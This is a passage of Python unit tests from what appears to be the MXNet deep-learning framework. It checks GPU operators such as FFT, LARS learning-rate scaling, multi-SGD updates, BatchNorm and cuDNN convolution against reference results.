shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym._simple_bind(**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
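# Verifies mx.nd.multi_sum_sq: two invocations must agree (the operator is
# expected to be deterministic) and match a float32 NumPy reference of the
# per-array sum of squares.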
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
@pytest.mark.serial
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16' in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
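# Verifies the LARS building blocks: multi_sum_sq for the weight/gradient
# norms and multi_lars for the per-layer learning rate
# lr * eta * ||w|| / (||g|| + wd * ||w|| + eps), where the gradient norm
# includes rescale_grad and the base lr is kept when either norm is zero.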
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
@pytest.mark.serial
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16' in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
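# Checks that the preloaded_multi_*sgd* update operators (which take learning
# rates and weight decays as NDArrays) produce the same weights, momenta and
# float32 master weights as the corresponding multi_*sgd* operators that take
# them as lists.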
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
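    # Sweep dtype, momentum on/off and master-weight usage over random shape lists.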
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
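        # Master (fp32) weights are only exercised for fp16 parameters.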
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
@pytest.mark.serial
def test_batchnorm_with_type():
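    # Check BatchNorm consistency across CPU/GPU contexts and fp16/fp32/fp64 inputs for 1D, 2D and 3D data.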
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V2, 2D
bools = [False, True]
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_1D)
# V2, 3D
for fix_gamma, cudnn_off in itertools.product(bools, [True,]):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
@pytest.mark.serial
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
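    # sym2 builds an equivalent NHWC-layout convolution: transpose the data (NCHW->NHWC) and the weight (OIHW->OHWI), convolve, then transpose the result back to NCHW.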
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
    # wider tolerance needed for the true-fp16 tests above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, rtol=tol, atol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
@pytest.mark.serial
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
@pytest.mark.serial
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], scale=0.1)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
            # kernel overlap. The non-cudnn conv op doesn't do this, so it is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
                # tol can be pretty high; we're looking for a large diff due to a garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], rtol=1e-2, atol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@pytest.mark.skip(reason="skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in ['1', '2']:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print('Starting engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print('Finished engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
